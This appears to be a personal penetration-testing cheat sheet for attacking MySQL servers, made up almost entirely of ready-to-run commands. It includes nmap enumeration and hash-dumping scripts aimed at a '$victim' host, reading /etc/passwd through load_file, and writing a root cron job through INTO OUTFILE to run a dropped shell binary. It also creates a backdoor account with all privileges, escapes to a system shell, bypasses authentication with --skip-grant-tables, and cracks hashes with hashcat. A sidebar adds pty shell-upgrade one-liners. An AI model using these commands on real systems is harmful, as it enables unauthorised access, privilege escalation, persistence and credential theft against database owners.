akde/infosec

Information security is ultimately about managing risk

MySQL My Structured Query Language

, , ,

Con­nect:

mysql --host=10.10.10.13 -P4444 -u admin admin

Var­i­ous commands:

  • Read ver­sion
    SELECT version();
  • Read user info:
    SELECT * FROM mysql.user;

Enumeration

Nmap scripts

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim
proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim

Exploitation

Read and write

Read with the cur­rent process id:

SELECT load_file('/etc/passwd');

Write as the dae­mon process id:

CREATE TABLE bbb(content TEXT);
INSERT INTO bbb (content) VALUES ("* * * * * root /tmp/shell_80.elf");
SELECT * FROM bbb INTO OUTFILE '/etc/cron.d/ex1';

Notes

  • If –secure-file-priv is not set, root can be obtained.
  • MySQL runs as root? Check out the rap­tor exploit.
  • Use –pro­to­col tcp to force tcp (no socket)
  • When (e.g. in meter­preter) the inter­ac­tive ses­sion does­n’t work, exe­cute com­mands like this:
    mysql.exe -u root -Bse "SHOW DATABASES;"
    • Note: Emp­ty pass­word = NO p flag!
  • Cre­ate a user and then log in from anoth­er host:
    mysql.exe -u root -Bse "CREATE USER 'fffff'@'*' IDENTIFIED BY '3o4eworhhgfkurtz5o654';"
    mysql.exe -u root -Bse "GRANT ALL ON *.* to fffff@'%' IDENTIFIED BY '3o4eworhhgfkurtz5o654';"
    mysql.exe -u root -Bse "FLUSH PRIVILEGES;"

  • Use with­in a MySQL shell to get a shell:
system shell
  • Queries can be writ­ten into files:
SELECT order_id,product_name,qty FROM orders
INTO OUTFILE '/tmp/orders.txt'

Password cracking

If you have root, you can crack the cre­den­tials the fol­low­ing way:

Stop MySQL

# service mysql stop
mysql stop/waiting

Start MySQL

# mysqld_safe --skip-grant-tables --skip-syslog --skip-networking

Open MySQL shell

# mysql -u root mysql

Query the user table

mysql> SELECT * FROM user;

Obtain the pass­word hashs (with­out the lead­ing *), add them into a file and ask Hash­cat for help

hashcat -m300 -a0 --self-test-disable /tmp/hash /opt/all_seclist_with_rockyou.txt

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';